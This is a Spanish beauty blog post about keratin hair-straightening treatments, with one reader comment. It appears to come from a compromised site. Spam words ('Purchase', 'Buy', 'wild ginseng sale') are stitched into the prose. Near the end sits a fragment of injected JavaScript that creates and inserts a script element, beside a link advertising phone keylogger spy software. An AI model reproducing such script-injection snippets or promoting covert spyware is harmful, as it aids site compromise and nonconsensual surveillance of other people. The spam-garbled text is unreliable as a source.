Salud y belleza » Belleza, Salud

Alisado permanente con Keratina

1 Comentario

Si eres de esas personas que tienes el pelo rebelde y te tienes que despertar una hora antes para plancharte el pelo todas las mañanas y que tus amigos no vean en realidad la verdadera apariencia de tu cabello quizás te convendría probar el Order alisado permanente con keratina para lucir un liso perfecto durante un tiempo y olvidarte cada mañana de la esclavitud con la plancha o el secador.

pelo-destrozado

Los tratamientos con keratina son lo último para alisar tu cabello, porque consiguen dejar un cabello liso perfecto y porque la keratina además ayuda a revitalizar y dar brillo a tu melena Purchase . Además de lisa, tendrás una melena suave, saludable y revitalizada. Lo bueno es que el tratamiento de keratina es mucho más natural que otros tratamientos y además lucirás una cabellera lista que todas envidiarán.

alisado-keratina Buy

Sin embargo, tenemos que advertir que este tratamiento no es recomendable para personas con cabello muy fino o para embarazadas.

El tratamiento de alisado permanente con keratina es muy sencillo y muchas veces no necesitas más de una hora para realizarlo. Solo necesitas aplicarte la keratina de 5 a 10 minutos según tu tipo de cabello y luego debes plancharte el pelo para que coja la forma que quieras.

wild ginseng sale

alisado-con-keratina online

Normalmente el alisado con keratina puede durar entre 4 y 5 meses. Para muchos es un tiempo muy corto, pero en realidad podrás olvidarte de alisarte el pelo durante casi medio año, y si el tratamiento se prolongara más podría ser tóxico para el cabello.

¿Te has hecho alguna vez el alisado con keratina? ¿Cómo fue?

Purchase document.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement('script'); Buy http://naliv.kauza.mk/2017/10/31/phone-keylogger-track-someone-phone-spy-software-text/

Más consejos de salud y belleza : , ,

One Comment »

  • Lidia said:

    Yo lo probé, me duró solo 5 meses pero tuve el pelo todos los días suave, brillante y liso. No tenía que plancharme todos los días ni se me quemó ni nada. En cuanto coja otro piquito volvería a hacérmelo, la pena es que no dure para siempre :)

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.